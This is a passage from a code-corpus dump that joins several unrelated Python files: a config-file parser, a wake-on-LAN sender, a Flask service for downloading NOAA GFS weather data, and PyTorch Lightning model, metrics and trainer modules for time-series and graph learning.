self.items = []
self.config_file = config_file
self.defaults = defaults
# store the lines in the config file (just the ones
# directly in this file, not imported files) so that
# we can save the file back as it was when set() is called
self.lines = []
# dict of key -> line number (mapping to items in self.lines)
# so that set() is able to modify values in specified lines.
# this dict will not contain mappings for blank lines or comments
self.line_numbers = {}
self._read_file()
def _read_file(self):
if not self.config_file: return
exists = os.path.exists(self.config_file)
if not exists and self.must_exist:
raise ValueError('file does not exist: ' + \
self.config_file)
if exists:
previous_line = None
line_number = -1
for line in open(self.config_file, 'r'):
line_number += 1
self.lines.append(line.rstrip('\n\r'))
asrt_eq(len(self.lines)-1, line_number)
if previous_line != None:
line = previous_line + line.lstrip()
previous_line = None
newline_match = match_groups(NEWLINE, line)
if newline_match:
previous_line = line[:-len(newline_match[0])]
continue
if line.strip() == '':
continue
comment_match = COMMENT_REGEX.match(line)
value_match = VALUE_REGEX.match(line)
import_match = IMPORT_REGEX.match(line)
if comment_match != None:
# Ignore as this line is a comment line
pass
elif value_match != None:
groups = value_match.groups()
self._set_attr(groups[0], groups[1])
self.line_numbers[groups[0]] = line_number
elif import_match != None:
groups = import_match.groups()
c = ConfigFile(expand(groups[0]))
self.import_configfile(c)
else:
raise ValueError('Line "' + line + \
'" in file "' + self.config_file + \
'" is not in the right format')
for (k, v) in list(self.defaults.items()):
if not self.has(k):
self._set_attr(k, v)
def import_configfile(self, configfile, overwrite = False):
"""Import the items in another configfile into this configfile
If overwrite is True, any values that exist in this
instance and also in configfile are overwritten by the ones in
configfile. if overwrite is False, the values in this instance
are preserved.
"""
asrt(type(configfile) is ConfigFile, 'configfile must be a ConfigFile instance (was ' + str(type(configfile)) + ', ' + str(configfile) + ')')
for name, value in list(configfile.get_all().items()):
if self.has(name) and not overwrite: continue
self._set_attr(name, value)
def _set_attr(self, name, value):
if name.startswith('_'):
raise ValueError('Bad property name "' + name + '", cannot set attributes starting with _')
cv = self.get_configvalue(name)
if cv:
value = convert_value(value, cv.val_type)
self.items_dict[name] = value
def get_configvalue(self, name):
"""look up a ConfigValue
returns None if ConfigValues have not been set for this ConfigFile
"""
if not self.config_values: return None
n = name.lower()
if not n in list(self.config_values.keys()):
raise ValueError('Error in ' + self.config_file + ', property "' + name + '" invalid; no corresponding ConfigValue')
return self.config_values[n]
def get(self, name, val_type = None):
"""Retrieve a setting from the ConfigFile.
If this ConfigFile has been configured with ConfigValues,
and the corresponding ConfigValue for `name` has a default_value
set, that value is returned if it does not exist in the ConfigFile.
val_type can be specified, in which case the type of the value
returned can be specified. This is most useful in cases where
ConfigValues are being used to specify different datatypes; val_type
can be specified to make the code more readable and to give you
assurance that you'll get a certain type back.
NB In practice setting val_type does not cause conversions to be
performed. If set, the val_type is compared with the actual return
type and an exception is thrown if they do not match.
"""
result = None
if name in self.items_dict:
result = self.items_dict[name]
else:
cv = self.get_configvalue(name)
if cv: result = cv.default_value
# validate type against val_type
if val_type and (val_type != type(result)):
raise ValueError('Value for "' + name + '" is wrong type.' + \
'Expected: ' + str(val_type) + ', actual: ' + str(type(result)))
return result
def get_bool(self, name):
"""get as a boolean."""
if not self.has(name): return False
s = self.get(name)
return convert_to_bool(s)
def has(self, name):
return name in self.items_dict
def get_single(self, name):
"""Get a single property by name. An exception is thrown
if more than one property by this name exists"""
result = self.get_list(name)
if len(result) > 1:
raise ValueError('More than one value has been assigned for setting ' + name)
# values are already unpacked by get_list()
return result[0]
def get_all(self, prefix=None):
"""Get all properties. (Meaning only those defined; for example, those
where defaults have been set are *not* included in the return value
for this method.)
If prefix is specified, only return those with that prefix"""
if prefix is None:
return dict(self.items_dict)
else:
result = {}
prefixl = prefix.lower()
for (k, v) in list(self.items_dict.items()):
if k.lower().startswith(prefixl):
result[k] = v
return result
def set(self, key, value, write = True):
"""set a value in the config file and write the config file to disk
if write is False, do not write to disk, just keep the new value in
memory"""
cv = self.get_configvalue(key)
self._set_attr(key, value)
line_number = self.line_numbers.get(key)
new_line = '%s = %s' % (key, value)
if line_number is not None:
self.lines[line_number] = new_line
else:
self.lines.append('')
self.lines.append(new_line)
self.line_numbers[key] = len(self.lines)-1
if write:
with open(self.config_file, 'w') as f:
for line in self.lines:
f.write(line)
f.write('\n')
def set_with_dict(self, values, write = True):
"""set several values in the config file and write the config file to disk
if write is False, do not write to disk, just keep the new value in
memory
values should be a dict consisting of keys->values to write
"""
for key, value in list(values.items()):
cv = self.get_configvalue(key)
self._set_attr(key, value)
line_number = self.line_numbers.get(key)
new_line = '%s = %s' % (key, value)
if line_number is not None:
self.lines[line_number] = new_line
else:
self.lines.append('')
self.lines.append(new_line)
self.line_numbers[key] = len(self.lines)-1
if write:
with open(self.config_file, 'w') as f:
for line in self.lines:
f.write(line)
f.write('\n')
class ConfigValue(object):
"""Represents a configuration value (or rather, the configuration
of that configuration value)."""
def __init__(self, name, default_value = None, val_type = str):
self.name = name
self.default_value = default_value
self.val_type = val_type
# ensure the ConfigValue's default_value is the right type
if type(self.default_value) != self.val_type:
self.default_value = convert_value(self.default_value, self.val_type)
```
#### File: jonnyt886/jpy/wakeonlan.py
```python
import struct, socket
def wakeonlan(ethernet_address):
# construct a six-byte hardware address
addr_byte = ethernet_address.split(':')
hw_addr = struct.pack('BBBBBB',
int('0x' + addr_byte[0], 16),
int('0x' + addr_byte[1], 16),
int('0x' + addr_byte[2], 16),
int('0x' + addr_byte[3], 16),
int('0x' + addr_byte[4], 16),
int('0x' + addr_byte[5], 16)
)
# build the wake-on-lan "magic packet"...
msg = '\xff' * 6 + hw_addr * 16
# ...and send it to the broadcast address using udp
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.sendto(msg, ('<broadcast>', 7))
s.close()
#wakeonlan('d0:27:88:61:39:b8')
``` |
{
"source": "jonnyteronni/cicd-project",
"score": 3
} |
#### File: cicd-project/src/test.py
```python
def calc(x, y):
return x + y
def test_calc():
assert 5 == calc(2, 3)
``` |
{
"source": "Jonnytoshen/wind-layer",
"score": 2
} |
#### File: src/config/grib.py
```python
import os
GFS_DATE = "20200312" # 数据时间
GFS_TIME = "18" # 起报时间 00, 06, 12, 18
RES = "0p25" # 数据分辨率 0p25: 0.25, 0p50:0.5 or 1p00:1
BBOX = "leftlon=0&rightlon=360&toplat=90&bottomlat=-90" # 数据范围
LEVEL = "lev_10_m_above_ground=on" # 数据层次
VARIABLES = "var_UGRD=on&var_VGRD=on&var_TMP=on" # 要素
GRIB_DES = "pgrb2" # 文件说明 默认为pgrb2 0.5分辨率的为pgrb2full
FORECASTS_TIME = "f000"
GFS_URL = "https://nomads.ncep.noaa.gov/cgi-bin/" \
"filter_gfs_${RES}.pl?file=gfs.t${GFS_TIME}z.${GRIB_DES}" \
".${RES}.${FORECASTS_TIME}&${LEVEL}&${VARIABLES}&${BBOX}&dir=%2Fgfs" \
".${GFS_DATE}%2F${GFS_TIME}"
GRS_PAGE = "https://nomads.ncep.noaa.gov/cgi-bin/" \
"filter_gfs_${RES}.pl?dir=%2Fgfs" \
".${GFS_DATE}%2F${GFS_TIME}"
OUTPUT_BASE_DIR = os.getcwd()
OUTPUT_DIR = 'static/data'
OUTPUT_JSON_DIR = 'static/json'
OUTPUT_RASTER_DIR = 'static/raster'
BASE_DIR = os.path.abspath(os.path.join(OUTPUT_BASE_DIR, OUTPUT_DIR))
BASE_JSON_DIR = os.path.abspath(os.path.join(OUTPUT_BASE_DIR, OUTPUT_JSON_DIR))
BASE_RASTER_DIR = os.path.abspath(os.path.join(OUTPUT_BASE_DIR, OUTPUT_RASTER_DIR))
def get_download_url(date, gfs_time, res, forecasts_time, bbox, level, variables):
gfs_date = date or GFS_DATE
gfs_time = gfs_time or GFS_TIME
res = res or RES
forecasts_time = forecasts_time or FORECASTS_TIME
bbox = bbox or BBOX
level = level or LEVEL
variables = variables or VARIABLES
grib_des = GRIB_DES
if res == "0p50":
grib_des = 'pgrb2full'
gfs_url = GFS_URL\
.replace("${RES}", res)\
.replace("${FORECASTS_TIME}", forecasts_time)\
.replace("${BBOX}", bbox)\
.replace("${GFS_TIME}", gfs_time)\
.replace("${GRIB_DES}", grib_des)\
.replace("${GFS_DATE}", gfs_date)\
.replace("${LEVEL}", level)\
.replace("${VARIABLES}", variables)
return {
'GFS_DATE': gfs_date,
'GFS_TIME': gfs_time,
'RES': res,
'BBOX': bbox,
'LEVEL': level,
'VARIABLES': variables,
'GFS_URL': gfs_url,
}
def get_page_url(date, gfs_time, res):
gfs_date = date or GFS_DATE
gfs_time = gfs_time or GFS_TIME
res = res or RES
page_url = GRS_PAGE \
.replace("${RES}", res) \
.replace("${GFS_TIME}", gfs_time) \
.replace("${GFS_DATE}", gfs_date)
return page_url
def get_file_path(file_path, name):
basePath = os.path.abspath(os.path.join(OUTPUT_BASE_DIR, OUTPUT_DIR))
path = os.path.join(basePath, file_path)
full_path = os.path.join(path, name)
if os.path.exists(path):
print('basedir exist')
else:
os.makedirs(path)
if os.path.exists(full_path) and os.path.getsize(full_path):
return {
"exist": True,
"path": full_path,
}
else:
return {
"exist": False,
"path": full_path,
}
def get_json_path(file_path, name):
path = os.path.join(BASE_JSON_DIR, file_path)
full_path = os.path.join(path, name)
if os.path.exists(path):
print('basedir exist')
else:
os.makedirs(path)
if os.path.exists(full_path) and os.path.getsize(full_path):
return {
"exist": True,
"path": full_path,
}
else:
return {
"exist": False,
"path": full_path,
}
def get_raster_path(file_path, name):
path = os.path.join(BASE_RASTER_DIR, file_path)
full_path = os.path.join(path, name)
if os.path.exists(path):
print('basedir exist')
else:
os.makedirs(path)
if os.path.exists(full_path) and os.path.getsize(full_path):
return {
"exist": True,
"path": full_path,
}
else:
return {
"exist": False,
"path": full_path,
}
```
#### File: src/controller/index.py
```python
from flask import abort, jsonify, request
from flask_cors import cross_origin
from src.app import app
from src.enum.res import ResModel
from src.utils.common import check_fields
from src.config.grib import get_page_url
from src.service.index import get_gfs_params
from src.service.grib import download_data
"""
获取元数据列表,gfs原始格点数据,每个时间存在一个grib数据中
"""
@app.route('/', methods=['GET', 'POST'])
@cross_origin()
def index():
return jsonify(ResModel('success').success())
"""
根据用户参数下载对应grib文件(注意只是在服务端执行下载,并不会
发送到客户端)
"""
DOWNLOAD_PARAMS_ENUM = [
{
'value': 'date',
'required': True
}, # gfs 日期
{
'value': 'gfsTime',
'required': True
}, # gfs 时间
{
'value': 'res',
'required': True
}, # 分辨率
{
'value': 'forecastsTime',
'required': False,
'default': 'f000'
}, # 预报时间 前120h逐一小时
{
'value': 'bbox',
'required': False,
'default': '0,-90,360,90'
}, # 数据范围
{
'value': 'level',
'required': False,
'default': 'lev_10_m_above_ground'
}, # 数据层次
{
'value': 'variables',
'required': False,
'default': 'var_UGRD,var_VGRD'
}, # 需要下载的要素
]
@app.route('/download', methods=['GET', 'POST'])
@app.errorhandler(400)
@cross_origin()
def start_download():
method = request.method
try:
params = {}
if method == 'GET' and request.args is not None:
params = check_fields(DOWNLOAD_PARAMS_ENUM, request.args, True)
elif method == 'POST' and request.json is not None:
params = check_fields(DOWNLOAD_PARAMS_ENUM, request.json, True)
if len(params) > 0:
bbox = params['bbox'].split(',')
bbox = f"leftlon={bbox[0]}&rightlon={bbox[2]}&toplat={bbox[3]}&bottomlat={bbox[1]}"
variables = params['variables'].split(',')
fileprefix = '-'.join(map(lambda str: str.lower(), variables))
variables = ''.join(map(lambda str: f"{str}=on&", variables))
filename = download_data(params['date'], params['gfsTime'], params['res'], params['forecastsTime'], bbox, params['level'], variables, fileprefix)
if filename['code'] == 200:
return jsonify(ResModel(filename['data']).success())
else:
return jsonify(ResModel('无数据').not_find(filename['message']))
else:
return jsonify()
except Exception as e:
return e
"""
获取相关可使用参数
"""
GET_PARAMS_ENUM = [
{
'value': 'date',
'required': True
}, # gfs 日期
{
'value': 'gfsTime',
'required': True
}, # gfs 时间
{
'value': 'res',
'required': True
} # 分辨率
]
@app.route('/params', methods=['GET', 'POST'])
@app.errorhandler(400)
@cross_origin()
def get_surfaces():
method = request.method
try:
params = {}
if method == 'GET' and request.args is not None:
params = check_fields(GET_PARAMS_ENUM, request.args, True)
elif method == 'POST' and request.json is not None:
params = check_fields(GET_PARAMS_ENUM, request.json, True)
if len(params) > 0:
page_url = get_page_url(params['date'], params['gfsTime'], params['res'])
params = get_gfs_params(page_url)
return jsonify(ResModel(params).success())
else:
return jsonify()
except Exception as e:
return e
```
#### File: src/service/grib.py
```python
import os
import requests
from requests import HTTPError
from src.config.grib import get_download_url, get_file_path
from src.entity.grib import GribTable
table_db = GribTable()
def download_data(date, gfs_time, res, forecasts_time, bbox, level, variables, fileprefix):
config = get_download_url(date, gfs_time, res, forecasts_time, bbox, level, variables)
if not fileprefix:
fileprefix = ""
else:
fileprefix = f"{fileprefix}"
filepath = f"{date}/{gfs_time}/{res}/{forecasts_time}/"
file = get_file_path(filepath, f"{fileprefix}.grib")
dir_path = os.path.join(filepath, f"{fileprefix}.grib")
filename = file.get('path')
# 如果文件存在并且文件大小大于0则不再下载
if file.get('exist') == True:
return dir_path
else:
try:
r = requests.get(config.get('GFS_URL'))
r.raise_for_status()
with open(filename, "wb") as f:
f.write(r.content)
table_db.add(date, gfs_time, res, forecasts_time, bbox, level, variables, fileprefix, dir_path)
return {
'data': dir_path,
'code': r.status_code,
'message': 'success',
}
except HTTPError as e:
# raise HTTPError("Something went wrong with the data download.") from e
return {
'code': e.response.status_code,
'message': e.args[0],
}
if __name__ == '__main__':
download_data(
'20200526',
'00',
'1p00',
'leftlon=0&rightlon=360&toplat=90&bottomlat=-90',
# 'lev_80_m_above_ground=on',
'lev_10_m_above_ground=on',
'var_UGRD=on&var_VGRD=on',
# 'var_TMP=on',
'uv'
)
print('success')
``` |
{
"source": "JonnyTran/espresso-manifold",
"score": 2
} |
#### File: src/model/autoencoder.py
```python
import numpy as np
import torch
from pytorch_lightning import LightningModule
from tsa import TimeSeriesDataset
from tsa.model import AutoEncForecast
class ShotsAutoEncForecast(AutoEncForecast, LightningModule):
def __init__(self, dataset: TimeSeriesDataset, config):
self.dataset = dataset
input_size = len(self.dataset.feature_cols)
config["output_size"] = len(dataset.target_col)
config["label_col"] = dataset.target_col
super().__init__(config, input_size)
self.criterion = torch.nn.MSELoss()
self.hparams.update(config)
def training_step(self, batch, batch_nb):
feature, y_hist, target = batch
feature = torch.nan_to_num(feature)
output = self.forward(feature, y_hist)
loss = self.criterion.forward(output, target)
self.log("loss", loss)
# self.log_dict(logs, prog_bar=True, logger=True)
return loss
def validation_step(self, batch, batch_nb):
feature, y_hist, target = batch
feature = torch.nan_to_num(feature)
output = self.forward(feature, y_hist)
loss = self.criterion.forward(output, target)
self.log("val_loss", loss)
# self.log_dict(logs, prog_bar=True, logger=True)
return loss
def test_step(self, batch, batch_nb):
feature, y_hist, target = batch
feature = torch.nan_to_num(feature)
output = self.forward(feature, y_hist)
loss = self.criterion.forward(output, target)
self.log("test_loss", loss)
# self.log_dict(logs, prog_bar=True, logger=True)
return loss
def train_dataloader(self):
self.train_iter, self.test_iter, n_features = self.dataset.get_loaders(
batch_size=self.hparams["batch_size"], num_workers=4)
return self.train_iter
def val_dataloader(self):
self.train_iter, self.test_iter, n_features = self.dataset.get_loaders(
batch_size=self.hparams["batch_size"], num_workers=4)
return self.test_iter
def test_dataloader(self):
self.train_iter, self.test_iter, n_features = self.dataset.get_loaders(
batch_size=self.hparams["batch_size"], num_workers=4)
return self.test_iter
def get_n_params(self):
model_parameters = filter(lambda tup: tup[1].requires_grad and "embedding" not in tup[0],
self.named_parameters())
params = sum([np.prod(p.size()) for name, p in model_parameters])
return params
def configure_optimizers(self):
param_optimizer = list(self.named_parameters())
no_decay = ['bias', 'alpha_activation', 'batchnorm', 'layernorm', "activation", "embedding",
'LayerNorm.bias', 'LayerNorm.weight',
'BatchNorm.bias', 'BatchNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for name, p in param_optimizer \
if not any(key in name for key in no_decay) \
and "embeddings" not in name],
'weight_decay': self.hparams['weight_decay']},
{'params': [p for name, p in param_optimizer if any(key in name for key in no_decay)],
'weight_decay': 0.0},
]
optimizer = torch.optim.Adam(optimizer_grouped_parameters, lr=self.hparams["lr"])
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=self.hparams['lrs_step_size'], gamma=0.5)
return {"optimizer": optimizer, 'lr_scheduler': scheduler, "monitor": "val_loss"}
``` |
{
"source": "JonnyTran/LATTE",
"score": 2
} |
#### File: JonnyTran/LATTE/metrics.py
```python
import numpy as np
import numpy as np
import torch
import torchmetrics
from ignite.exceptions import NotComputableError
from ignite.metrics import Precision, Recall, TopKCategoricalAccuracy
from ogb.graphproppred import Evaluator as GraphEvaluator
from ogb.linkproppred import Evaluator as LinkEvaluator
from ogb.nodeproppred import Evaluator as NodeEvaluator
from pytorch_lightning.metrics import F1, AUROC, AveragePrecision, MeanSquaredError, Accuracy
from sklearn.metrics import homogeneity_score, completeness_score, normalized_mutual_info_score, \
adjusted_mutual_info_score
from utils import filter_samples
def clustering_metrics(y_true, y_pred, metrics=["homogeneity", "completeness", "nmi", "ami"]):
results = {}
for metric in metrics:
if "homogeneity" in metric:
results[metric] = homogeneity_score(y_true, y_pred)
elif "completeness" in metric:
results[metric] = completeness_score(y_true, y_pred)
elif "nmi" in metric:
results[metric] = normalized_mutual_info_score(y_true, y_pred, average_method="arithmetic")
elif "ami" in metric:
results[metric] = adjusted_mutual_info_score(y_true, y_pred)
return results
class Metrics(torch.nn.Module):
def __init__(self, prefix, loss_type: str, threshold=0.5, top_k=[1, 5, 10], n_classes: int = None,
multilabel: bool = None, metrics=["precision", "recall", "top_k", "accuracy"]):
super().__init__()
self.loss_type = loss_type.upper()
self.threshold = threshold
self.n_classes = n_classes
self.multilabel = multilabel
self.top_ks = top_k
self.prefix = prefix
self.metrics = {}
for metric in metrics:
if "precision" == metric:
self.metrics[metric] = Precision(average=True, is_multilabel=multilabel)
elif "recall" == metric:
self.metrics[metric] = Recall(average=True, is_multilabel=multilabel)
elif "top_k" in metric:
if n_classes:
top_k = [k for k in top_k if k < n_classes]
if multilabel:
self.metrics[metric] = TopKMultilabelAccuracy(k_s=top_k)
else:
self.metrics[metric] = TopKCategoricalAccuracy(k=max(int(np.log(n_classes)), 1),
output_transform=None)
elif "macro_f1" in metric:
self.metrics[metric] = F1(num_classes=n_classes, average="macro", multilabel=multilabel)
elif "micro_f1" in metric:
self.metrics[metric] = F1(num_classes=n_classes, average="micro", multilabel=multilabel)
elif "mse" == metric:
self.metrics[metric] = MeanSquaredError()
elif "auroc" == metric:
self.metrics[metric] = AUROC(num_classes=n_classes)
elif "avg_precision" in metric:
self.metrics[metric] = AveragePrecision(num_classes=n_classes, )
elif "accuracy" in metric:
self.metrics[metric] = Accuracy(top_k=int(metric.split("@")[-1]) if "@" in metric else None)
elif "ogbn" in metric:
self.metrics[metric] = OGBNodeClfMetrics(NodeEvaluator(metric))
elif "ogbg" in metric:
self.metrics[metric] = OGBNodeClfMetrics(GraphEvaluator(metric))
elif "ogbl" in metric:
self.metrics[metric] = OGBLinkPredMetrics(LinkEvaluator(metric))
else:
print(f"WARNING: metric {metric} doesn't exist")
# Needed to add the PytorchGeometric methods as Modules, so they'll be on the correct CUDA device during training
if isinstance(self.metrics[metric], torchmetrics.metric.Metric):
setattr(self, metric, self.metrics[metric])
self.reset_metrics()
def update_metrics(self, y_hat: torch.Tensor, y: torch.Tensor, weights=None):
"""
:param y_pred:
:param y_true:
:param weights:
"""
y_pred = y_hat.detach()
y_true = y.detach()
y_pred, y_true = filter_samples(y_pred, y_true, weights)
# Apply softmax/sigmoid activation if needed
if "LOGITS" in self.loss_type or "FOCAL" in self.loss_type:
if "SOFTMAX" in self.loss_type:
y_pred = torch.softmax(y_pred, dim=1)
else:
y_pred = torch.sigmoid(y_pred)
elif "NEGATIVE_LOG_LIKELIHOOD" == self.loss_type or "SOFTMAX_CROSS_ENTROPY" in self.loss_type:
y_pred = torch.softmax(y_pred, dim=1)
for metric in self.metrics:
# torchmetrics metrics
if isinstance(self.metrics[metric], torchmetrics.metric.Metric):
self.metrics[metric].update(y_pred, y_true)
# Torch ignite metrics
elif "precision" in metric or "recall" in metric or "accuracy" in metric:
if not self.multilabel and y_true.dim() == 1:
self.metrics[metric].update((self.hot_encode(y_pred.argmax(1, keepdim=False), type_as=y_true),
self.hot_encode(y_true, type_as=y_pred)))
else:
self.metrics[metric].update(((y_pred > self.threshold).type_as(y_true), y_true))
# Torch ignite metrics
elif metric == "top_k":
self.metrics[metric].update((y_pred, y_true))
# OGB metrics
elif "ogb" in metric:
if metric in ["ogbl-ddi", "ogbl-collab"]:
y_true = y_true[:, 0]
elif "ogbg-mol" in metric:
# print(tensor_sizes({"y_pred": y_pred, "y_true": y_true}))
pass
self.metrics[metric].update((y_pred, y_true))
else:
raise Exception(f"Metric {metric} has problem at .update()")
def hot_encode(self, labels, type_as):
if labels.dim() == 2:
return labels
elif labels.dim() == 1:
labels = torch.eye(self.n_classes)[labels].type_as(type_as)
return labels
def compute_metrics(self):
logs = {}
for metric in self.metrics:
try:
if "ogb" in metric:
logs.update(self.metrics[metric].compute(prefix=self.prefix))
elif metric == "top_k" and isinstance(self.metrics[metric], TopKMultilabelAccuracy):
logs.update(self.metrics[metric].compute(prefix=self.prefix))
elif metric == "top_k" and isinstance(self.metrics[metric], TopKCategoricalAccuracy):
metric_name = (metric if self.prefix is None else \
self.prefix + metric) + f"@{self.metrics[metric]._k}"
logs[metric_name] = self.metrics[metric].compute()
else:
metric_name = metric if self.prefix is None else self.prefix + metric
logs[metric_name] = self.metrics[metric].compute()
except Exception as e:
print(f"Had problem with metric {metric}, {str(e)}\r")
# Needed for Precision(average=False) metrics
logs = {k: v.mean() if isinstance(v, torch.Tensor) and v.numel() > 1 else v for k, v in logs.items()}
return logs
def reset_metrics(self):
for metric in self.metrics:
self.metrics[metric].reset()
class OGBNodeClfMetrics(torchmetrics.Metric):
def __init__(self, evaluator, compute_on_step: bool = True, dist_sync_on_step: bool = False,
process_group=None, dist_sync_fn=None):
super().__init__(compute_on_step, dist_sync_on_step, process_group, dist_sync_fn)
self.evaluator = evaluator
self.y_pred = []
self.y_true = []
def reset(self):
self.y_pred = []
self.y_true = []
def update(self, y_pred, y_true):
if isinstance(self.evaluator, (NodeEvaluator, GraphEvaluator)):
assert y_pred.dim() == 2
if y_true.dim() == 1 or y_true.size(1) == 1:
y_pred = y_pred.argmax(axis=1)
if y_pred.dim() <= 1:
y_pred = y_pred.unsqueeze(-1)
if y_true.dim() <= 1:
y_true = y_true.unsqueeze(-1)
self.y_true.append(y_true)
self.y_pred.append(y_pred)
def compute(self, prefix=None):
if isinstance(self.evaluator, NodeEvaluator):
output = self.evaluator.eval({"y_pred": torch.cat(self.y_pred, dim=0),
"y_true": torch.cat(self.y_true, dim=0)})
elif isinstance(self.evaluator, LinkEvaluator):
y_pred_pos = torch.cat(self.y_pred, dim=0).squeeze(-1)
y_pred_neg = torch.cat(self.y_true, dim=0)
output = self.evaluator.eval({"y_pred_pos": y_pred_pos,
"y_pred_neg": y_pred_neg})
output = {k.strip("_list"): v.mean().item() for k, v in output.items()}
elif isinstance(self.evaluator, GraphEvaluator):
input_shape = {"y_true": torch.cat(self.y_pred, dim=0),
"y_pred": torch.cat(self.y_true, dim=0)}
output = self.evaluator.eval(input_shape)
else:
raise Exception(f"implement eval for {self.evaluator}")
if prefix is None:
return {f"{k}": v for k, v in output.items()}
else:
return {f"{prefix}{k}": v for k, v in output.items()}
class OGBLinkPredMetrics(torchmetrics.Metric):
def __init__(self, evaluator: LinkEvaluator, compute_on_step: bool = True, dist_sync_on_step: bool = False,
process_group=None, dist_sync_fn=None):
super().__init__(compute_on_step, dist_sync_on_step, process_group, dist_sync_fn)
self.evaluator = evaluator
self.outputs = {}
def reset(self):
self.outputs = {}
def update(self, e_pred_pos, e_pred_neg):
if e_pred_pos.dim() > 1:
e_pred_pos = e_pred_pos.squeeze(-1)
# if e_pred_neg.dim() <= 1:
# e_pred_neg = e_pred_neg.unsqueeze(-1)
# print("e_pred_pos", e_pred_pos.shape)
# print("e_pred_neg", e_pred_neg.shape)
output = self.evaluator.eval({"y_pred_pos": e_pred_pos,
"y_pred_neg": e_pred_neg})
for k, v in output.items():
if isinstance(v, float):
score = torch.tensor([v])
self.outputs.setdefault(k.strip("_list"), []).append(score)
else:
self.outputs.setdefault(k.strip("_list"), []).append(v.mean())
def compute(self, prefix=None):
output = {k: torch.stack(v, dim=0).mean().item() for k, v in self.outputs.items()}
if prefix is None:
return {f"{k}": v for k, v in output.items()}
else:
return {f"{prefix}{k}": v for k, v in output.items()}
class TopKMultilabelAccuracy(torchmetrics.Metric):
"""
Calculates the top-k categorical accuracy.
- `update` must receive output of the form `(y_pred, y)` or `{'y_pred': y_pred, 'y': y}` Tensors of size (batch_size, n_classes).
"""
def __init__(self, k_s=[5, 10, 50, 100, 200], compute_on_step: bool = True, dist_sync_on_step: bool = False,
process_group=None, dist_sync_fn=None):
super().__init__(compute_on_step, dist_sync_on_step, process_group, dist_sync_fn)
self.k_s = k_s
def reset(self):
self._num_correct = {k: 0 for k in self.k_s}
self._num_examples = 0
def update(self, y_pred, y_true):
batch_size, n_classes = y_true.size()
_, top_indices = y_pred.topk(k=max(self.k_s), dim=1, largest=True, sorted=True)
for k in self.k_s:
y_true_select = torch.gather(y_true, 1, top_indices[:, :k])
corrects_in_k = y_true_select.sum(1) * 1.0 / k
corrects_in_k = corrects_in_k.sum(0) # sum across all samples to get # of true positives
self._num_correct[k] += corrects_in_k.item()
self._num_examples += batch_size
def compute(self, prefix=None) -> dict:
if self._num_examples == 0:
raise NotComputableError("TopKCategoricalAccuracy must have at"
"least one example before it can be computed.")
if prefix is None:
return {f"top_k@{k}": self._num_correct[k] / self._num_examples for k in self.k_s}
else:
return {f"{prefix}top_k@{k}": self._num_correct[k] / self._num_examples for k in self.k_s}
```
#### File: JonnyTran/LATTE/trainer.py
```python
import itertools
import logging
import pandas as pd
import torch
from pytorch_lightning import LightningModule
from metrics import clustering_metrics, Metrics
from utils import preprocess_input, tensor_sizes
class ClusteringEvaluator(LightningModule):
def register_hooks(self):
# Register hooks for embedding layer and classifier layer
for name, layer in self.named_children():
layer.__name__ = name
print(name)
layer.register_forward_hook(self.save_embedding)
layer.register_forward_hook(self.save_pred)
# def save_node_ids(module, inputs):
# # if module.training: return
# logging.info(f"save_node_ids @ {module.__name__} {tensor_sizes(inputs)}")
#
# # Register a hook to get node_ids input
# for layer in itertools.islice(self.modules(), 1):
# print(layer.name())
# layer.register_forward_pre_hook(save_node_ids)
def save_embedding(self, module, _, outputs):
if self.training:
return
if module.__name__ == "embedder":
logging.info(f"save_embedding @ {module.__name__}")
if isinstance(outputs, (list, tuple)):
self._embeddings = outputs[0]
else:
self._embeddings = outputs
def save_pred(self, module, _, outputs):
if self.training:
return
if module.__name__ in ["classifier"]:
logging.info(
f"save_pred @ {module.__name__}, output {tensor_sizes(outputs)}")
if isinstance(outputs, (list, tuple)):
self._y_pred = outputs[0]
else:
self._y_pred = outputs
def trainvalidtest_dataloader(self):
return self.dataset.trainvalidtest_dataloader(collate_fn=self.collate_fn, )
def clustering_metrics(self, n_runs=10, compare_node_types=True):
loader = self.trainvalidtest_dataloader()
X_all, y_all, _ = next(iter(loader))
self.cpu().forward(preprocess_input(X_all, device="cpu"))
if not isinstance(self._embeddings, dict):
self._embeddings = {list(self._node_ids.keys())[0]: self._embeddings}
embeddings_all, types_all, y_true = self.dataset.get_embeddings_labels(self._embeddings, self._node_ids)
# Record metrics for each run in a list of dict's
res = [{}, ] * n_runs
for i in range(n_runs):
y_pred = self.dataset.predict_cluster(n_clusters=len(y_true.unique()), seed=i)
if compare_node_types and len(self.dataset.node_types) > 1:
res[i].update(clustering_metrics(y_true=types_all,
# Match y_pred to type_all's index
y_pred=types_all.index.map(lambda idx: y_pred.get(idx, "")),
metrics=["homogeneity_ntype", "completeness_ntype", "nmi_ntype"]))
if y_pred.shape[0] != y_true.shape[0]:
y_pred = y_pred.loc[y_true.index]
res[i].update(clustering_metrics(y_true,
y_pred,
metrics=["homogeneity", "completeness", "nmi"]))
res_df = pd.DataFrame(res)
metrics = res_df.mean(0).to_dict()
return metrics
class NodeClfTrainer(ClusteringEvaluator):
def __init__(self, hparams, dataset, metrics, *args, **kwargs):
super().__init__(*args, **kwargs)
self.train_metrics = Metrics(prefix="", loss_type=hparams.loss_type, n_classes=dataset.n_classes,
multilabel=dataset.multilabel, metrics=metrics)
self.valid_metrics = Metrics(prefix="val_", loss_type=hparams.loss_type, n_classes=dataset.n_classes,
multilabel=dataset.multilabel, metrics=metrics)
self.test_metrics = Metrics(prefix="test_", loss_type=hparams.loss_type, n_classes=dataset.n_classes,
multilabel=dataset.multilabel, metrics=metrics)
hparams.name = self.name()
hparams.inductive = dataset.inductive
self._set_hparams(hparams)
def name(self):
if hasattr(self, "_name"):
return self._name
else:
return self.__class__.__name__
def training_epoch_end(self, outputs):
avg_loss = torch.stack([x["loss"] for x in outputs]).mean().item()
logs = self.train_metrics.compute_metrics()
# logs = _fix_dp_return_type(logs, device=outputs[0]["loss"].device)
logs.update({"loss": avg_loss})
self.train_metrics.reset_metrics()
self.log_dict(logs)
return None
def validation_epoch_end(self, outputs):
avg_loss = torch.stack([x["val_loss"] for x in outputs]).mean().item()
logs = self.valid_metrics.compute_metrics()
# logs = _fix_dp_return_type(logs, device=outputs[0]["val_loss"].device)
# print({k: np.around(v.item(), decimals=3) for k, v in logs.items()})
logs.update({"val_loss": avg_loss})
self.valid_metrics.reset_metrics()
self.log_dict(logs, prog_bar=logs)
return None
def test_epoch_end(self, outputs):
